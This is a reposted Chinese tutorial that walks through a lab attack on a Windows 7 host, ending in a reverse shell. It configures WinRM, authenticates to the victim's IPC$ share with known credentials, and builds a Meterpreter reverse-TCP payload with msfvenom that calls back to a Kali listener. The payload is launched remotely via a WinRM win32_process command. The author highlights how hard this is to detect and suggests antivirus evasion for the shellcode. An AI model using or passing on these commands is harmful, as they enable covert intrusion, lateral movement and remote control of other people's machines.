利用WinRM实现内网无文件攻击反弹shell
原文转自:https://www.freebuf.com/column/212749.html
前言
WinRM是Windows Remote Managementd(win远程管理)的简称。基于Web服务管理(WS-Management)标准,使用80端口或者443端口。这样一来,我们就可以在对方有设置防火墙的情况下远程管理这台服务器了。
Server2008R2及往上的系统中默认中都开启该服务,从Server2012系统后开始,该WinRM服务便被设置为默认开启。Win7系统中却默认安装此WinRM服务,但是默认为禁用状态,Win8系统和Win10系统也都默认开启WinRM服务。
WinRM的好处在于,这种远程连接不容易被察觉到,也不会占用远程连接数!
环境准备
WinRM会用到5985、5986 端口,所以防火墙必须做开放处理。
用Administrator(管理员)账户登录攻击机器
前提知道被攻击方的用户登录账户密码
Windows操作系统中,默认是开启共享IPC$的
内网IP:192.168.10.1(win10)
被攻击机IP:192.168.10.130(win7)
攻击机IP:192.168.10.149(Kali)
攻击过程
一、快速在(win10)运行winrm
命令:winrm quickconfig
注:Win10是默认开启winrm,win7不是默认的。开启winrm service服务链接:https://jingyan.baidu.com/article/9158e0006b27dfa254122813.html
二、net use连接(win7)
命令:net use \\192.168.10.130\ipc$ “密码” /user:“用户名” (命令不唯一)
四、在(win7)中放置木马,并且用(kali)接收反弹的shell 生成shellcode
命令:msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=192.168.10.149 lport=7777 -f exe -o ./xxx.exe
把”xxx.exe”放在(win7)的C盘根目录.
kali启动监听shell模式
利用(win10)的WinRM 实现内网无文件攻击反弹shell,在(win10)中执行以下命令
Winrm invoke create wmicimv2/win32_process @{commandline=”\\192.168.10.130\c\xxx.exe”}
反弹成功
总结和反思
shellcode还可以做一些免杀处理,使其更加的完美。(有待大佬们再次总结)
winrm service 服务配置要正确
ipc共享的时候命令不唯一,看准空格很重要,连接状态有时候自己断开(我还没找到原因,请教大佬),需要重新连接。
用win2008没成功,可能虚拟机问题